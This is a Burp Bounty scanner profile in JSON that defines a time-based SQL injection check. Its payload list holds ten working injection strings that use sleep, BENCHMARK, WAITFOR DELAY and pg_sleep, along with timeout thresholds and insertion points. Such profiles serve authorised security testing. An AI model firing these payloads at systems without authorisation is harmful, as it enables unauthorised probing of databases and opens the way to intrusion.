[
  {
    "ProfileName": "SQLi_TimeBased",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@burpbounty",
    "Payloads": [
      "true,(select*from(select(sleep(20)))a)",
      "true,(sleep+20)--",
      "true,(sleep+20)",
      "true,(sleep(20))--",
      "true,(sleep(20))",
      "true,(SELECT+BENCHMARK(2000000,MD5(\u0027A\u0027)));",
      "true,(SELECT+SLEEP(20))",
      "true,(WAITFOR+DELAY+\u00270:0:20\u0027)--",
      "true,(WAITFOR+DELAY+\u00270:0:20\u0027)",
      "true,(SELECT+pg_sleep(20))"
    ],
    "Encoder": [],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [],
    "Tags": [
      "All",
      "SQLi"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "18",
    "TimeOut2": "23",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "isHeaderValue": false,
    "sequence": false,
    "NewHeaders": [],
    "MatchType": 5,
    "Scope": 0,
    "RedirType": 0,
    "MaxRedir": 0,
    "requestType": 1,
    "rawRequest": "",
    "payloadPosition": 1,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "SQLi_TimeBased",
    "IssueSeverity": "High",
    "IssueConfidence": "Tentative",
    "IssueDetail": "This profile generates false positives. Manually check that the time delay is actually due to a SQLi timebased vulnerability and not to a network delay.\n\n\u003cbr/\u003e\u003cbr/\u003e- PAYLOAD: \u003cbr/\u003e\u003cpayload\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n- GREP: \u003cbr/\u003e\u003cgrep\u003e",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      18,
      65,
      70,
      80,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      21,
      31,
      41,
      51,
      61,
      71,
      72,
      73,
      74,
      75,
      76,
      77,
      36,
      81,
      82
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false,
    "changeHttpRequest": false,
    "showIssue": false,
    "changeHttpRequestType": 1
  }
]